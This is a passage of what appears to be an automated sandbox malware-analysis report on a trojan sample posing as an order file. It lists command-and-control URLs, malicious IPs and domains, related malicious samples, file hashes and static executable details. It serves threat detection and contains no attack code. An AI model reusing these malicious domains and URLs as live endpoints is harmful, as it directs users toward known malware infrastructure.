                                              http://www.goeseo.com/meub/?ktI=F4zWwb5Q9DmjBwYPj4pXutYCzYEQVONbMin29ERkoE+ZXMdA8ttbKylRMOj5c1Wk3PTt&6lt4=M6ATVT20FLjtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              www.uuoouu-90.store/meub/true
                                              • Avira URL Cloud: safe
                                              		low

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7Smstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssOrder 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.carterandcone.comlexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.searchvity.com/mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.%s.comPAexplorer.exe, 00000002.00000002.932522691.0000000002B50000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		low
                                                                  http://www.fonts.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.sandoll.co.krexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.searchvity.com/?dn=mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder 122001-220 guanzo.exe, 00000000.00000002.672299597.0000000002541000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comexplorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      107.164.93.172
                                                                      		www.tjanyancha.comUnited States
                                                                      		18779EGIHOSTINGUStrue
                                                                      34.102.136.180
                                                                      		thefrankversion.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      18.219.49.238
                                                                      		www.goodcreditcardshome.infoUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      162.241.62.63
                                                                      		pasteleriaruth.comUnited States
                                                                      		46606UNIFIEDLAYER-AS-1UStrue
                                                                      66.96.162.130
                                                                      		www.goeseo.comUnited States
                                                                      		29873BIZLAND-SDUStrue
                                                                      104.164.26.246
                                                                      		www.dmowang.comUnited States
                                                                      		18779EGIHOSTINGUStrue
                                                                      198.54.117.216
                                                                      		parkingpage.namecheap.comUnited States
                                                                      		22612NAMECHEAP-NETUSfalse

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:412023
                                                                      Start date:12.05.2021
                                                                      Start time:10:49:16
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 11m 13s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:Order 122001-220 guanzo.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:5
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/1@13/7
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 12.4% (good quality ratio 10.9%)
                                                                      • Quality average: 71.2%
                                                                      • Quality standard deviation: 32.2%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 93
                                                                      • Number of non-executed functions: 162
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      10:50:15API Interceptor1x Sleep call for process: Order 122001-220 guanzo.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      18.219.49.238PO9448882.exeGet hashmaliciousBrowse
                                                                      • www.goodcreditcardshome.info/meub/?8p64Z2=V6A8xrZp&y8y=DPnd9be3H9/Wrgpowt0tpNLwJs/XJA2QjoJDXsDZ4FmTGUIfdjkf0y045ev+tDntqFRk
                                                                      Bs04AQyK2o.exeGet hashmaliciousBrowse
                                                                      • www.myattorneypicksnowonline.info/cyna/?AnB=O0DXDNwPE&GzuD=QlqunCFLfjJqxV/yJCze+AvWCSb5dgMSWlYge6YDzwoRQ//tSmh1eiTvl1ncSRgieIqF
                                                                      Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                                                      • www.greaterdiabetes.info/bw82/?K4k0=QSf3WUlUuQtxRpqTh0PyZWAWCLqQSiplzZ1yvio+dQu1sol/QfNL/rp7Q9iT+rghV3Ar&dDH=P0GPezWpdVGtah
                                                                      INTABINA.exeGet hashmaliciousBrowse
                                                                      • www.bipolartreatmentcenters.info/t65/?o8bdE=CaWwaRYeWES2ZpJp03tplUpNjUx+TtQQvGnSFVeAPVbx3JhsarFIKTbTEy9q2/vEn+U6&ElP=VZyLPx2Pwh4XuHxP
                                                                      66.96.162.13050% payment.exeGet hashmaliciousBrowse
                                                                      • www.nicksayler.net/ey9c/?VRKt=wBZlC2d0f6W4LB&BZOPIF=zemMvuHYOZF6HFuoZzbL7otG0FuLt5HQ0QHjJ1h3UiaYeVUoeANMZZbryDjJGiqNYZ4O
                                                                      o0Ka2BsNBq.exeGet hashmaliciousBrowse
                                                                      • www.imaginenationnetwork.com/8rg4/?AdkDpFa=8m/W0lhjduV58ZCB+v/V4udkt2Gx5MpGpLsDd1ppZKo4MszNwiI0YkW1Mn6ANFSTV5IZUjNr5g==&pPX=EFQD_FT0CVqx
                                                                      43order pdf.exeGet hashmaliciousBrowse
                                                                      • www.admarketingsales.com/nk7/?VBl=XTL8HNfpyPY&hdr4D=Lc54ZMkx7TXzX8Hn+HSOC/SDZ1fuYvEd/qDSQ5e94F4oyaPb0rbdlEOtPyLKhkDNTfwG
                                                                      198.54.117.216Purchase Order.exeGet hashmaliciousBrowse
                                                                      • www.beautiful.tours/u8nw/?jZhtajbP=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf7fUay48reW+&wJB=-ZLXOP0XzvBHZPRp
                                                                      slot Charges.exeGet hashmaliciousBrowse
                                                                      • www.beautiful.tours/u8nw/?iL3=MQ9/9ugzkHdx3WtCI0DhBFFcg9k9u8cd1L6Gj19/moDWYxZ8Cy1uW7tlf4zuZzUHop3vdg1M+Q==&z6A=7n3h7JeH
                                                                      2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                      • www.tab-nejersey.com/bncm/?LXedv=gRRRQVunFc3rumuoaYeGWZdKAARhtbqMo9o+4TfiCOcYfsgfAtZcdfy2djC7awoP2YIn&lhv4=O0DPaJ7hHb34yZ
                                                                      g1EhgmCqCD.exeGet hashmaliciousBrowse
                                                                      • www.donelys.com/8u3b/?DzrXY=E22nI3RnpwZWCefDbfimDOhq+q3UJ25lzo576Tq9svNo94y15LKXeVX0ss+5c65l5TJA&zR-4v=0v1D8ZZ8otVT4F9P
                                                                      24032130395451.pdf .exeGet hashmaliciousBrowse
                                                                      • www.oldschoolnews.net/uabu/?ojqD-Z=KdrhxNh8&9r4Hc=ruxw5m/fBZTANxn0+vJzkbJheatIWyH69nVPD3/Jlr0HuUfdGUrtHvekpNeCw/DRWxiy
                                                                      pdf Re revised PI 900tons.exeGet hashmaliciousBrowse
                                                                      • www.barebeautybrand.com/edbs/?mHId9X=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJucRcL6VdOaJj4w++gA==&ExlldL=Udg8Tf2pOFu
                                                                      Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                      • www.alum2alum.network/evpn/?CZa4=kozDiZlecnkXSK85284p8pD4k2/h1KafOhFtAjgttK/6zeVOB185UpWNMWH27xqr42kf&CPWhW=C8eHk
                                                                      OrSxEMsYDA.exeGet hashmaliciousBrowse
                                                                      • www.moev.city/svh9/?s4Jxc=06m0IvzpaBhL8Lup&1bw=aJQR8+ngIk9GDIj7vnfNuHFQ6pDOInKj0o660hH8PI/DLizbc1YcQUY1VNOO6dLZdAltgKBIKQ==
                                                                      Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                      • www.barebeautybrand.com/edbs/?BbW=Ekboab0eq8QaRRJsr09zs/Usmrg5EP+fQbkocCp54h0GPmynCi9xyIzJucdcYqZeXKJ1&blX=yVCTVP0X
                                                                      Quotation.exeGet hashmaliciousBrowse
                                                                      • www.clickqrcoaster.com/fcn/?ndsxlrp=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&wZALH=PToxs4gHMXctdDo
                                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                      • www.boogerstv.com/p2io/?pJE8=G0GpifmhvxtXlZL&-ZoXL=fW2NkW2m2880y7g2f/m+egXTc5dWq8qtohIQX9xRv3Snfsyr1ZmLXRti4FdN58+iKIl8Sw==
                                                                      ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                      • www.911salesrescue.com/sqra/?Rl=pq8KHaLgBYlMb7GR3VJ/cL4dF9VTs2jS1VGjWDfBvu/RR65b3/eoUhDFCE5vmyzJV1nh&_jqT2L=gBg8BF3ptlc
                                                                      1517679127365.exeGet hashmaliciousBrowse
                                                                      • www.swavhca.com/ct6a/?YP=fbdhu8lXTJZTH&LhN0T=t85XbN3qNlbTw/JaLNJ7F4/+On2opPlRNjQpYLfn5nRJIrt0zCXnGg8yVYHQwlCaZVdo
                                                                      TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                      • www.switcheo.finance/uwec/?-ZVd=1bgta&T8VxaVs=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTQ14Zv3dTuQV
                                                                      igPVY6UByI.exeGet hashmaliciousBrowse
                                                                      • www.dbdcontractlngllc.com/evpn/?6lB4ir3X=HFShCSWXwaKkW2ZiFlcUlPO3+HJMVrrKG3pif6jrFe/K9RUAGcpqC/YV0bjZ8afR2I7A&lZQ=fxoxjP38
                                                                      order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                                      • www.gattisicecream.com/nu8e/?7ntLT=H0OBJMmEUgvZcgBddvaavx+e86Q1Ewqz/q4u2TIdbw6nMChu3R+Cq7j/in+DO7Gj50PD&v4Xpf=oBZl2rip
                                                                      P.O71540.xlsxGet hashmaliciousBrowse
                                                                      • www.toplevelsealcoating.net/njo/?jpal0=mxuHlFV+ZuSguIs2Jcwsp6DcsuxeedOYcK/5rsXgvOQsfT3joYJg2D4C6z0Ci+7Qc2CgOg==&3ft=fxotnVnH_pxPJD2P
                                                                      Purchase Order _pdf.exeGet hashmaliciousBrowse
                                                                      • www.doorman.pro/bft/?s8eTn6p=cPB7zr1p3SmwgzYXiBUkF9mwqufO0UDDdPUnBBhQn+hhkWASV2AK1gVN757rEFaij0Eh&2d=lnxh
                                                                      PO#4503527426.xlsxGet hashmaliciousBrowse
                                                                      • www.oodi.club/j5an/?3f=dOaW3vahSXqg4+CHM7A8brpc4JT3ik1DQ14U6alOEgrJbBQuvLIVfIvFsL19wjAmshOCtA==&SH=u2M0w8Cp
                                                                      SOA 2.docGet hashmaliciousBrowse
                                                                      • www.inifinityapps.net/bf3/?pBR=swuzFfg2YELF3Ru0riS9eAlbkrlhpvPYJEoO3kAfMfwngIUjKqHF470zbQhO/y10VYkWvA==&ON6h=lFQLUjPpddS8R0S0

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      parkingpage.namecheap.com00098765123POIIU.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      Inquiry_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      Citvonvhciktufwvyzyhistnewdjgsoqdr.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      POI09876OIUY.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      EDS03932,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      slot Charges.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      PO09641.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      BORMAR SA_Cotizaci#U00f3n de producto doc.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.211
                                                                      Purchase Order-10764.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.218
                                                                      2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      60b88477_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      0876543123.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      g1EhgmCqCD.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      Payment.xlsxGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      w73FtMA4ZTl9NFm.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      www.goodcreditcardshome.infoPO9448882.exeGet hashmaliciousBrowse
                                                                      • 18.219.49.238

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      AMAZON-02USmain_setup_x86x64.exeGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      A6FAm1ae1j.exeGet hashmaliciousBrowse
                                                                      • 3.138.180.119
                                                                      New_Order.exeGet hashmaliciousBrowse
                                                                      • 75.2.115.196
                                                                      NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 13.58.50.133
                                                                      YDHhjjAEFbel88t.exeGet hashmaliciousBrowse
                                                                      • 99.83.175.80
                                                                      yU7RItYEQ9kCkZE.exeGet hashmaliciousBrowse
                                                                      • 99.83.175.80
                                                                      Shipment Document BL,INV and packing List.exeGet hashmaliciousBrowse
                                                                      • 52.58.78.16
                                                                      4xPBZai06p.dllGet hashmaliciousBrowse
                                                                      • 13.225.75.73
                                                                      0OyVQNXrTo.exeGet hashmaliciousBrowse
                                                                      • 3.142.167.54
                                                                      rAd00Nae9w.dllGet hashmaliciousBrowse
                                                                      • 13.225.75.73
                                                                      DOC24457188209927.exeGet hashmaliciousBrowse
                                                                      • 13.224.193.2
                                                                      user-invoice-8488888.docGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      user-invoice-8488888.docGet hashmaliciousBrowse
                                                                      • 104.192.141.1
                                                                      ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                                                      • 13.113.228.117
                                                                      PO9448882.exeGet hashmaliciousBrowse
                                                                      • 18.219.49.238
                                                                      jjbxg8kh5X.exeGet hashmaliciousBrowse
                                                                      • 52.216.177.83
                                                                      4si5VtPNTe.exeGet hashmaliciousBrowse
                                                                      • 3.6.208.121
                                                                      latvia-order-051121_.docGet hashmaliciousBrowse
                                                                      • 52.219.129.63
                                                                      BANK-ACCOUNT. NUMBER.PDF.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4
                                                                      PRF00202156KMT.exeGet hashmaliciousBrowse
                                                                      • 3.16.197.4
                                                                      UNIFIEDLAYER-AS-1UScatalog-1908475637.xlsGet hashmaliciousBrowse
                                                                      • 108.167.180.164
                                                                      catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                      • 108.167.180.164
                                                                      export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                                                                      • 108.179.232.90
                                                                      XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.190.216
                                                                      QTFsui5pLN.xlsmGet hashmaliciousBrowse
                                                                      • 108.179.232.90
                                                                      15j1TCnOiA.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.115.105
                                                                      e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.190.216
                                                                      SOA PDF.exeGet hashmaliciousBrowse
                                                                      • 192.185.226.148
                                                                      djBLaxEojp.exeGet hashmaliciousBrowse
                                                                      • 192.185.161.67
                                                                      quotation 35420PDF.exeGet hashmaliciousBrowse
                                                                      • 192.185.41.225
                                                                      REQUEST FOR PRICE QUOTE - URGENT.pdf.exeGet hashmaliciousBrowse
                                                                      • 162.241.24.59
                                                                      551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.138.180
                                                                      invoice and packing list.pdf.exeGet hashmaliciousBrowse
                                                                      • 192.185.136.173
                                                                      PO82055.exeGet hashmaliciousBrowse
                                                                      • 192.185.161.67
                                                                      export of document 555091.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.173.71
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 192.185.190.186
                                                                      generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.55.9
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • 192.185.186.178
                                                                      fax 4044.xlsmGet hashmaliciousBrowse
                                                                      • 192.185.173.71
                                                                      scan of document 5336227.xlsmGet hashmaliciousBrowse
                                                                      • 162.241.55.9
                                                                      EGIHOSTINGUS00098765123POIIU.exeGet hashmaliciousBrowse
                                                                      • 45.39.20.158
                                                                      INv02938727.exeGet hashmaliciousBrowse
                                                                      • 107.165.40.251
                                                                      POI09876OIUY.exeGet hashmaliciousBrowse
                                                                      • 45.39.20.158
                                                                      invscan052021.exeGet hashmaliciousBrowse
                                                                      • 104.252.43.114
                                                                      PURCHASE ORDER 5112101.xlsxGet hashmaliciousBrowse
                                                                      • 172.252.102.196
                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 45.38.16.182
                                                                      WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                      • 142.111.54.187
                                                                      new order.xlsxGet hashmaliciousBrowse
                                                                      • 104.252.75.149
                                                                      Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                      • 166.88.252.48
                                                                      987654OIUYFG.exeGet hashmaliciousBrowse
                                                                      • 104.164.224.84
                                                                      2B0CsHzr8o.exeGet hashmaliciousBrowse
                                                                      • 107.186.80.147
                                                                      REVISED ORDER.exeGet hashmaliciousBrowse
                                                                      • 107.187.161.189
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • 45.38.16.182
                                                                      new order.exeGet hashmaliciousBrowse
                                                                      • 45.39.88.129
                                                                      TT.exeGet hashmaliciousBrowse
                                                                      • 107.165.149.13
                                                                      a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • 104.252.43.114
                                                                      Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                                                      • 107.165.10.98
                                                                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                      • 45.38.16.182
                                                                      DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                                      • 104.252.43.114
                                                                      Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                      • 104.252.53.97

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 122001-220 guanzo.exe.log
                                                                      Process:C:\Users\user\Desktop\Order 122001-220 guanzo.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1314
                                                                      Entropy (8bit):5.350128552078965
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.562702233782242
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      File name:Order 122001-220 guanzo.exe
                                                                      File size:736768
                                                                      MD5:9e819bcc826e7a20b0fd139cc4185195
                                                                      SHA1:bdb33c04403e308dcc79ced36201c577a40f0311
                                                                      SHA256:5b09da58ac487c25237bf1a8ba98988af849980d5fe92dd1ca417591b977d7a8
                                                                      SHA512:50af233a3a46a900fedc6b7dd946b69c8f19fef313b32836e84bf5150c6c4c91c9fbe109e1b62250010229a7a3caa33f20c6b65df95e53bc0692cba7b1b47899
                                                                      SSDEEP:12288:m/gn4mlGBkPyasxS/02yp+bqdGvCAPY4EEfySWfzC6v+qsMwWKWO:m4GeadxSB87GvLg6Ibv+ZXV
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.`.................*...........I... ...`....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:583cfc1c7062f870

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4a49ce
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
